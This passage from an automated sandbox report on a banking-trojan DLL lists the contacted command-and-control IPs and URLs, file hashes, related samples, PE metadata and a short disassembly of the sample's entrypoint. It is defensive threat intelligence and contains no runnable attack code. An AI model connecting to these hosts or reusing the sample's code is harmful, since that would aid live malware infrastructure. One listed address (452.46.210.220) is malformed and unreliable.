                              https://45.77.0.96:6891/graphyloaddll32.exe, 00000000.00000003.1084086671.00000000008DE000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1127362988.00000000008DE000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.917483761.00000000008DE000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.1197121469.00000000053DA000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://143.244.140.214:808/hy(loaddll32.exe, 00000000.00000003.866464673.00000000008DE000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://452.46.210.220/loaddll32.exe, 00000000.00000003.1102121755.00000000008DE000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              low
                              https://192.46.210.220/Ezirundll32.exe, 00000003.00000003.1052138868.0000000000F88000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://143.244.140.214:808/lpArundll32.exe, 00000003.00000003.838578926.0000000000F88000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://192.46.210.220/ographyloaddll32.exe, 00000000.00000003.1102121755.00000000008DE000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.917483761.00000000008DE000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1017606590.00000000008DE000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1059602410.00000000008DE000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.1197121469.00000000053DA000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              unknown

                              Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public

                              IPDomainCountryFlagASNASN NameMalicious
                              45.77.0.96
                              unknownUnited States
                              20473AS-CHOOPAUStrue
                              185.56.219.47
                              unknownItaly
                              202675KELIWEBITtrue
                              192.46.210.220
                              unknownUnited States
                              5501FRAUNHOFER-CLUSTER-BWResearchInstitutesspreadalloverGetrue
                              143.244.140.214
                              unknownUnited States
                              174COGENT-174UStrue

                              Private

                              IP
                              192.168.2.1

                              General Information

                              Joe Sandbox Version:33.0.0 White Diamond
                              Analysis ID:510684
                              Start date:28.10.2021
                              Start time:04:47:04
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 11m 7s
                              Hypervisor based Inspection enabled:false
                              Report type:light
                              Sample file name:SecuriteInfo.com.Variant.Razy.980776.25006.28161 (renamed file extension from 28161 to dll)
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                              Number of analysed new started processes analysed:22
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal84.bank.troj.evad.winDLL@11/2@0/5
                              EGA Information:Failed
                              HDC Information:
                              • Successful, ratio: 29.5% (good quality ratio 29.3%)
                              • Quality average: 81.9%
                              • Quality standard deviation: 15%
                              HCA Information:
                              • Successful, ratio: 65%
                              • Number of executed functions: 0
                              • Number of non-executed functions: 0
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              • Override analysis time to 240s for rundll32
                              Warnings:
                              Show All
                              • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                              • TCP Packets have been reduced to 100
                              • Excluded IPs from analysis (whitelisted): 51.11.168.232, 20.82.210.154, 23.211.6.115, 13.107.246.254, 13.107.3.254, 52.113.196.254, 173.222.108.210, 173.222.108.226, 20.82.209.183, 20.50.102.62, 80.67.82.211, 80.67.82.235, 20.54.110.249, 40.112.88.60, 52.251.79.25
                              • Excluded domains from analysis (whitelisted): s-ring.msedge.net, consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, teams-9999.teams-msedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, settings-win.data.microsoft.com, ctldl.windowsupdate.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, t-ring.msedge.net, s-ring.s-9999.s-msedge.net, settingsfd-geo.trafficmanager.net, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, t-9999.t-msedge.net, store-images.s-microsoft.com, s-9999.s-msedge.net, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, teams-ring.teams-9999.teams-msedge.net, t-ring.t-9999.t-msedge.net, teams-ring.msedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                              • Report size getting too big, too many NtEnumerateKey calls found.
                              • Report size getting too big, too many NtEnumerateValueKey calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              04:48:58API Interceptor184x Sleep call for process: rundll32.exe modified
                              04:49:01API Interceptor184x Sleep call for process: loaddll32.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              45.77.0.96SecuriteInfo.com.Variant.Razy.980776.28328.dllGet hashmaliciousBrowse
                                SecuriteInfo.com.Variant.Razy.980776.4470.dllGet hashmaliciousBrowse
                                  SecuriteInfo.com.Variant.Razy.980776.14159.dllGet hashmaliciousBrowse
                                    SecuriteInfo.com.Variant.Razy.980776.20807.dllGet hashmaliciousBrowse
                                      SecuriteInfo.com.Variant.Razy.980776.27063.dllGet hashmaliciousBrowse
                                        SecuriteInfo.com.Variant.Razy.980776.2260.dllGet hashmaliciousBrowse
                                          SecuriteInfo.com.Variant.Razy.980776.12452.dllGet hashmaliciousBrowse
                                            SecuriteInfo.com.Variant.Razy.980776.6851.dllGet hashmaliciousBrowse
                                              SecuriteInfo.com.Variant.Razy.980776.2379.dllGet hashmaliciousBrowse
                                                SecuriteInfo.com.Variant.Razy.980776.10617.dllGet hashmaliciousBrowse
                                                  SecuriteInfo.com.Variant.Razy.980776.24814.dllGet hashmaliciousBrowse
                                                    SecuriteInfo.com.Variant.Razy.980776.29553.dllGet hashmaliciousBrowse
                                                      SecuriteInfo.com.Variant.Razy.980776.15127.dllGet hashmaliciousBrowse
                                                        SecuriteInfo.com.Variant.Razy.980776.28360.dllGet hashmaliciousBrowse
                                                          SecuriteInfo.com.Variant.Razy.980776.19796.dllGet hashmaliciousBrowse
                                                            SecuriteInfo.com.Variant.Razy.980776.9816.dllGet hashmaliciousBrowse
                                                              SecuriteInfo.com.Variant.Razy.980776.17887.dllGet hashmaliciousBrowse
                                                                SecuriteInfo.com.Variant.Razy.980776.9354.dllGet hashmaliciousBrowse
                                                                  SecuriteInfo.com.Variant.Razy.980776.302.dllGet hashmaliciousBrowse
                                                                    SecuriteInfo.com.Variant.Razy.980776.25001.dllGet hashmaliciousBrowse
                                                                      185.56.219.47SecuriteInfo.com.Variant.Razy.980776.28328.dllGet hashmaliciousBrowse
                                                                        SecuriteInfo.com.Variant.Razy.980776.4470.dllGet hashmaliciousBrowse
                                                                          SecuriteInfo.com.Variant.Razy.980776.14159.dllGet hashmaliciousBrowse
                                                                            SecuriteInfo.com.Variant.Razy.980776.20807.dllGet hashmaliciousBrowse
                                                                              SecuriteInfo.com.Variant.Razy.980776.27063.dllGet hashmaliciousBrowse
                                                                                SecuriteInfo.com.Variant.Razy.980776.2260.dllGet hashmaliciousBrowse
                                                                                  SecuriteInfo.com.Variant.Razy.980776.12452.dllGet hashmaliciousBrowse
                                                                                    SecuriteInfo.com.Variant.Razy.980776.6851.dllGet hashmaliciousBrowse
                                                                                      SecuriteInfo.com.Variant.Razy.980776.2379.dllGet hashmaliciousBrowse
                                                                                        SecuriteInfo.com.Variant.Razy.980776.10617.dllGet hashmaliciousBrowse
                                                                                          SecuriteInfo.com.Variant.Razy.980776.24814.dllGet hashmaliciousBrowse
                                                                                            SecuriteInfo.com.Variant.Razy.980776.29553.dllGet hashmaliciousBrowse
                                                                                              SecuriteInfo.com.Variant.Razy.980776.15127.dllGet hashmaliciousBrowse
                                                                                                SecuriteInfo.com.Variant.Razy.980776.28360.dllGet hashmaliciousBrowse
                                                                                                  SecuriteInfo.com.Variant.Razy.980776.19796.dllGet hashmaliciousBrowse
                                                                                                    SecuriteInfo.com.Variant.Razy.980776.9816.dllGet hashmaliciousBrowse
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.17887.dllGet hashmaliciousBrowse
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.9354.dllGet hashmaliciousBrowse
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.302.dllGet hashmaliciousBrowse
                                                                                                            SecuriteInfo.com.Variant.Razy.980776.25001.dllGet hashmaliciousBrowse

                                                                                                              Domains

                                                                                                              No context

                                                                                                              ASN

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                              KELIWEBITSecuriteInfo.com.Variant.Razy.980776.28328.dllGet hashmaliciousBrowse
                                                                                                              • 185.56.219.47
                                                                                                              SecuriteInfo.com.Variant.Razy.980776.4470.dllGet hashmaliciousBrowse
                                                                                                              • 185.56.219.47
                                                                                                              SecuriteInfo.com.Variant.Razy.980776.14159.dllGet hashmaliciousBrowse
                                                                                                              • 185.56.219.47
                                                                                                              SecuriteInfo.com.Variant.Razy.980776.20807.dllGet hashmaliciousBrowse
                                                                                                              • 185.56.219.47
                                                                                                              SecuriteInfo.com.Variant.Razy.980776.27063.dllGet hashmaliciousBrowse
                                                                                                              • 185.56.219.47
                                                                                                              SecuriteInfo.com.Variant.Razy.980776.2260.dllGet hashmaliciousBrowse
                                                                                                              • 185.56.219.47
                                                                                                              SecuriteInfo.com.Variant.Razy.980776.12452.dllGet hashmaliciousBrowse
                                                                                                              • 185.56.219.47
                                                                                                              SecuriteInfo.com.Variant.Razy.980776.6851.dllGet hashmaliciousBrowse
                                                                                                              • 185.56.219.47
                                                                                                              SecuriteInfo.com.Variant.Razy.980776.2379.dllGet hashmaliciousBrowse
                                                                                                              • 185.56.219.47
                                                                                                              SecuriteInfo.com.Variant.Razy.980776.10617.dllGet hashmaliciousBrowse
                                                                                                              • 185.56.219.47
                                                                                                              SecuriteInfo.com.Variant.Razy.980776.24814.dllGet hashmaliciousBrowse
                                                                                                              • 185.56.219.47
                                                                                                              SecuriteInfo.com.Variant.Razy.980776.29553.dllGet hashmaliciousBrowse
                                                                                                              • 185.56.219.47
                                                                                                              SecuriteInfo.com.Variant.Razy.980776.15127.dllGet hashmaliciousBrowse
                                                                                                              • 185.56.219.47
                                                                                                              SecuriteInfo.com.Variant.Razy.980776.28360.dllGet hashmaliciousBrowse
                                                                                                              • 185.56.219.47
                                                                                                              SecuriteInfo.com.Variant.Razy.980776.19796.dllGet hashmaliciousBrowse
                                                                                                              • 185.56.219.47
                                                                                                              SecuriteInfo.com.Variant.Razy.980776.9816.dllGet hashmaliciousBrowse
                                                                                                              • 185.56.219.47
                                                                                                              SecuriteInfo.com.Variant.Razy.980776.17887.dllGet hashmaliciousBrowse
                                                                                                              • 185.56.219.47
                                                                                                              SecuriteInfo.com.Variant.Razy.980776.9354.dllGet hashmaliciousBrowse
                                                                                                              • 185.56.219.47
                                                                                                              SecuriteInfo.com.Variant.Razy.980776.302.dllGet hashmaliciousBrowse
                                                                                                              • 185.56.219.47
                                                                                                              SecuriteInfo.com.Variant.Razy.980776.25001.dllGet hashmaliciousBrowse
                                                                                                              • 185.56.219.47
                                                                                                              AS-CHOOPAUSSecuriteInfo.com.Variant.Razy.980776.28328.dllGet hashmaliciousBrowse
                                                                                                              • 45.77.0.96
                                                                                                              SecuriteInfo.com.Variant.Razy.980776.4470.dllGet hashmaliciousBrowse
                                                                                                              • 45.77.0.96
                                                                                                              SecuriteInfo.com.Variant.Razy.980776.14159.dllGet hashmaliciousBrowse
                                                                                                              • 45.77.0.96
                                                                                                              SecuriteInfo.com.Variant.Razy.980776.20807.dllGet hashmaliciousBrowse
                                                                                                              • 45.77.0.96
                                                                                                              SecuriteInfo.com.Variant.Razy.980776.27063.dllGet hashmaliciousBrowse
                                                                                                              • 45.77.0.96
                                                                                                              SecuriteInfo.com.Variant.Razy.980776.2260.dllGet hashmaliciousBrowse
                                                                                                              • 45.77.0.96
                                                                                                              SecuriteInfo.com.Variant.Razy.980776.12452.dllGet hashmaliciousBrowse
                                                                                                              • 45.77.0.96
                                                                                                              SecuriteInfo.com.Variant.Razy.980776.6851.dllGet hashmaliciousBrowse
                                                                                                              • 45.77.0.96
                                                                                                              SecuriteInfo.com.Variant.Razy.980776.2379.dllGet hashmaliciousBrowse
                                                                                                              • 45.77.0.96
                                                                                                              SecuriteInfo.com.Variant.Razy.980776.10617.dllGet hashmaliciousBrowse
                                                                                                              • 45.77.0.96
                                                                                                              SecuriteInfo.com.Variant.Razy.980776.24814.dllGet hashmaliciousBrowse
                                                                                                              • 45.77.0.96
                                                                                                              SecuriteInfo.com.Variant.Razy.980776.29553.dllGet hashmaliciousBrowse
                                                                                                              • 45.77.0.96
                                                                                                              SecuriteInfo.com.Variant.Razy.980776.15127.dllGet hashmaliciousBrowse
                                                                                                              • 45.77.0.96
                                                                                                              SecuriteInfo.com.Variant.Razy.980776.28360.dllGet hashmaliciousBrowse
                                                                                                              • 45.77.0.96
                                                                                                              SecuriteInfo.com.Variant.Razy.980776.19796.dllGet hashmaliciousBrowse
                                                                                                              • 45.77.0.96
                                                                                                              SecuriteInfo.com.Variant.Razy.980776.9816.dllGet hashmaliciousBrowse
                                                                                                              • 45.77.0.96
                                                                                                              SecuriteInfo.com.Variant.Razy.980776.17887.dllGet hashmaliciousBrowse
                                                                                                              • 45.77.0.96
                                                                                                              SecuriteInfo.com.Variant.Razy.980776.9354.dllGet hashmaliciousBrowse
                                                                                                              • 45.77.0.96
                                                                                                              SecuriteInfo.com.Variant.Razy.980776.302.dllGet hashmaliciousBrowse
                                                                                                              • 45.77.0.96
                                                                                                              SecuriteInfo.com.Variant.Razy.980776.25001.dllGet hashmaliciousBrowse
                                                                                                              • 45.77.0.96

                                                                                                              JA3 Fingerprints

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                              51c64c77e60f3980eea90869b68c58a8SecuriteInfo.com.Variant.Razy.980776.28328.dllGet hashmaliciousBrowse
                                                                                                              • 192.46.210.220
                                                                                                              SecuriteInfo.com.Variant.Razy.980776.4470.dllGet hashmaliciousBrowse
                                                                                                              • 192.46.210.220
                                                                                                              SecuriteInfo.com.Variant.Razy.980776.14159.dllGet hashmaliciousBrowse
                                                                                                              • 192.46.210.220
                                                                                                              SecuriteInfo.com.Variant.Razy.980776.20807.dllGet hashmaliciousBrowse
                                                                                                              • 192.46.210.220
                                                                                                              SecuriteInfo.com.Variant.Razy.980776.27063.dllGet hashmaliciousBrowse
                                                                                                              • 192.46.210.220
                                                                                                              SecuriteInfo.com.Variant.Razy.980776.2260.dllGet hashmaliciousBrowse
                                                                                                              • 192.46.210.220
                                                                                                              SecuriteInfo.com.Variant.Razy.980776.12452.dllGet hashmaliciousBrowse
                                                                                                              • 192.46.210.220
                                                                                                              SecuriteInfo.com.Variant.Razy.980776.6851.dllGet hashmaliciousBrowse
                                                                                                              • 192.46.210.220
                                                                                                              SecuriteInfo.com.Variant.Razy.980776.2379.dllGet hashmaliciousBrowse
                                                                                                              • 192.46.210.220
                                                                                                              SecuriteInfo.com.Variant.Razy.980776.10617.dllGet hashmaliciousBrowse
                                                                                                              • 192.46.210.220
                                                                                                              SecuriteInfo.com.Variant.Razy.980776.24814.dllGet hashmaliciousBrowse
                                                                                                              • 192.46.210.220
                                                                                                              SecuriteInfo.com.Variant.Razy.980776.29553.dllGet hashmaliciousBrowse
                                                                                                              • 192.46.210.220
                                                                                                              SecuriteInfo.com.Variant.Razy.980776.15127.dllGet hashmaliciousBrowse
                                                                                                              • 192.46.210.220
                                                                                                              SecuriteInfo.com.Variant.Razy.980776.28360.dllGet hashmaliciousBrowse
                                                                                                              • 192.46.210.220
                                                                                                              SecuriteInfo.com.Variant.Razy.980776.19796.dllGet hashmaliciousBrowse
                                                                                                              • 192.46.210.220
                                                                                                              SecuriteInfo.com.Variant.Razy.980776.9816.dllGet hashmaliciousBrowse
                                                                                                              • 192.46.210.220
                                                                                                              SecuriteInfo.com.Variant.Razy.980776.17887.dllGet hashmaliciousBrowse
                                                                                                              • 192.46.210.220
                                                                                                              SecuriteInfo.com.Variant.Razy.980776.9354.dllGet hashmaliciousBrowse
                                                                                                              • 192.46.210.220
                                                                                                              SecuriteInfo.com.Variant.Razy.980776.302.dllGet hashmaliciousBrowse
                                                                                                              • 192.46.210.220
                                                                                                              SecuriteInfo.com.Variant.Razy.980776.25001.dllGet hashmaliciousBrowse
                                                                                                              • 192.46.210.220

                                                                                                              Dropped Files

                                                                                                              No context

                                                                                                              Created / dropped Files

                                                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                              File Type:Microsoft Cabinet archive data, 61157 bytes, 1 file
                                                                                                              Category:dropped
                                                                                                              Size (bytes):61157
                                                                                                              Entropy (8bit):7.995991509218449
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:1536:ppUkcaDREfLNPj1tHqn+ZQgYXAMxCbG0Ra0HMSAKMgAAaE1k:7UXaDR0NPj1Vi++xQFa07sTgAQ1k
                                                                                                              MD5:AB5C36D10261C173C5896F3478CDC6B7
                                                                                                              SHA1:87AC53810AD125663519E944BC87DED3979CBEE4
                                                                                                              SHA-256:F8E90FB0557FE49D7702CFB506312AC0B24C97802F9C782696DB6D47F434E8E9
                                                                                                              SHA-512:E83E4EAE44E7A9CBCD267DBFC25A7F4F68B50591E3BBE267324B1F813C9220D565B284994DED5F7D2D371D50E1EBFA647176EC8DE9716F754C6B5785C6E897FA
                                                                                                              Malicious:false
                                                                                                              Reputation:moderate, very likely benign file
                                                                                                              Preview: MSCF............,...................I........t........*S{I .authroot.stl..p.(.5..CK..8U....u.}M7{v!.\D.u.....F.eWI.!e..B2QIR..$4.%.3eK$J. ......9w4...=.9..}...~....$..h..ye.A..;....|. O6.a0xN....9..C..t.z.,..d`.c...(5.....<..1.|..2.1.0.g.4yw..eW.#.x....+.oF....8.t...Y....q.M.....HB.^y^a...)..GaV"|..+.'..f..V.y.b.V.PV......`..9+..\0.g...!.s..a....Q...........~@$.....8..(g..tj....=,V)v.s.d.].xqX4.....s....K..6.tH.....p~.2..!..<./X......r.. ?(.\[. H...#?.H.".. p.V.}.`L...P0.y....|...A..(...&..3.ag...c..7.T=....ip.Ta..F.....'..BsV...0.....f....Lh.f..6....u.....Mqm.,...@.WZ.={,;.J...)...{_Ao....T......xJmH.#..>.f..RQT.Ul(..AV..|.!k0...|\......U2U..........,9..+.\R..(.[.'M........0.o..,.t.#..>y.!....!X<o.....w...'......a.'..og+>..|.s.g.Wr.2K.=...5.YO.E.V.....`.O..[.d.....c..g....A..=....k..u2..Y.}.......C...\=...&...U.e...?...z.'..$..fj.'|.c....4y.".T.....X....@xpQ.,.q.."...t.... $.F..O.A.o_}d.3...z...F?..-...Fy...W#...1......T.3....x.
                                                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                              File Type:data
                                                                                                              Category:modified
                                                                                                              Size (bytes):326
                                                                                                              Entropy (8bit):3.102288469951472
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6:kKC5dFN+SkQlPlEGYRMY9z+4KlDA3RUeOlEfcTt:aX2kPlE99SNxAhUefit
                                                                                                              MD5:C3403C4FFF44128F945661306665CA78
                                                                                                              SHA1:E9FD91349B7A0C770CD9483682AFE1209DA277FE
                                                                                                              SHA-256:CFEEEFD49292C44FB2528B92F989C8E7E98E9341DE43A97E38D80E18F7DCFDF2
                                                                                                              SHA-512:2E0F6E27A65270EEB240C1C43B7BD6D21E406462A0767771282D6870B4FF050386DB30A6C576397B06C5A8FF4EAFC9DFDB71C04C55B0DDD8B91795AAD4469EAA
                                                                                                              Malicious:false
                                                                                                              Preview: p...... ..............(....................................................... ...........^.......$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.a.a.8.a.1.5.e.a.6.d.7.1.:.0."...

                                                                                                              Static File Info

                                                                                                              General

                                                                                                              File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                              Entropy (8bit):6.439660966717778
                                                                                                              TrID:
                                                                                                              • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                              • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                              • DOS Executable Generic (2002/1) 0.20%
                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                              File name:SecuriteInfo.com.Variant.Razy.980776.25006.dll
                                                                                                              File size:1375232
                                                                                                              MD5:78a0cdfef15a263e2821424593ccdcd5
                                                                                                              SHA1:23a3296897b37cc82088392a2a1762d1c7ead3f0
                                                                                                              SHA256:cfc9aa38844f62683f820c97371077d47a63b77ea093367a827b1315e9546a50
                                                                                                              SHA512:ad8343c95dd008940af3b5f8e37790cb1ccb458bb8a003e7808ad26fc1af2b5c5523f2b7888e4c189796c6fb119b9f55fec73c2893907dfd73de106236ba96c3
                                                                                                              SSDEEP:24576:InxqsL+DvNdnhMr5Lo6dOGcuQNrSH9d6N9eYWtZgDxxxSPnsqz7puATt5csRbu7z:Icfk82uAJTI7vPswKwu2
                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........N..FN..FN..F.]tFJ..FG..FR..F...GJ..F...GU..F...GS..F...Gi..F.]pF[..FN..F/..F...G...F...GO..F...FO..F...GO..FRichN..F.......

                                                                                                              File Icon

                                                                                                              Icon Hash:74f0e4ecccdce0e4

                                                                                                              Static PE Info

                                                                                                              General

                                                                                                              Entrypoint:0x4336b0
                                                                                                              Entrypoint Section:.text
                                                                                                              Digitally signed:false
                                                                                                              Imagebase:0x400000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                              Time Stamp:0x5BBD6578 [Wed Oct 10 02:35:36 2018 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:
                                                                                                              OS Version Major:6
                                                                                                              OS Version Minor:0
                                                                                                              File Version Major:6
                                                                                                              File Version Minor:0
                                                                                                              Subsystem Version Major:6
                                                                                                              Subsystem Version Minor:0
                                                                                                              Import Hash:ccbe70d6d0d02f6248ca160d6a0bb85b

                                                                                                              Entrypoint Preview

                                                                                                              Instruction
                                                                                                              push ebp
                                                                                                              mov ebp, esp
                                                                                                              cmp dword ptr [ebp+0Ch], 01h
                                                                                                              jne 00007FD5B4BB0B77h
                                                                                                              call 00007FD5B4BB18A7h
                                                                                                              mov eax, dword ptr [ebp+10h]
                                                                                                              push eax
                                                                                                              mov ecx, dword ptr [ebp+0Ch]
                                                                                                              push ecx
                                                                                                              mov edx, dword ptr [ebp+08h]
                                                                                                              push edx
                                                                                                              call 00007FD5B4BB0966h
                                                                                                              add esp, 0Ch
                                                                                                              pop ebp
                                                                                                              retn 000Ch
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              push ebp
                                                                                                              mov ebp, esp
                                                                                                              mov eax, dword ptr [0054806Ch]
                                                                                                              xor edx, edx
                                                                                                              mov ecx, 00000020h
                                                                                                              div ecx
                                                                                                              push edx
                                                                                                              mov edx, dword ptr [ebp+08h]
                                                                                                              xor edx, dword ptr [0054806Ch]
                                                                                                              push edx
                                                                                                              call 00007FD5B4BB0BB4h
                                                                                                              add esp, 08h
                                                                                                              pop ebp
                                                                                                              ret
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              push ebp
                                                                                                              mov ebp, esp
                                                                                                              mov eax, dword ptr [0054806Ch]
                                                                                                              xor edx, edx
                                                                                                              mov ecx, 00000020h
                                                                                                              div ecx
                                                                                                              mov eax, 00000020h
                                                                                                              sub eax, edx
                                                                                                              push eax
                                                                                                              mov ecx, dword ptr [ebp+08h]
                                                                                                              push ecx
                                                                                                              call 00007FD5B4BB0B83h
                                                                                                              add esp, 08h
                                                                                                              xor eax, dword ptr [0054806Ch]
                                                                                                              pop ebp
                                                                                                              ret
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              push ebp
                                                                                                              mov ebp, esp
                                                                                                              mov eax, dword ptr [ebp+08h]
                                                                                                              mov ecx, dword ptr [ebp+0Ch]
                                                                                                              ror eax, cl
                                                                                                              pop ebp
                                                                                                              ret
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              push ebp
                                                                                                              mov ebp, esp
                                                                                                              call 00007FD5B4BB1F0Dh
                                                                                                              push eax
                                                                                                              call 00007FD5B4BF2C17h
                                                                                                              add esp, 04h
                                                                                                              pop ebp
                                                                                                              ret
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              push ebp
                                                                                                              mov ebp, esp
                                                                                                              sub esp, 18h
                                                                                                              mov eax, dword ptr [ebp+00h]

                                                                                                              Data Directories

                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x1471900x6c.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x1471fc0x28.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x15c0000x72b4.reloc
                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x1431100x54.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1431680x40.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0xc70000x184.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                              Sections

                                                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                              .text0x10000xc5e2f0xc6000False0.442065922901data6.47812685416IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                              .rdata0xc70000x80aec0x80c00False0.534101941748data5.52050111516IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                              .data0x1480000x13ba00x1800False0.1875DOS executable (block device driverpyright)3.99635070896IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                              .reloc0x15c0000x72b40x7400False0.710264008621data6.69742088731IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                              Imports

                                                                                                              DLLImport
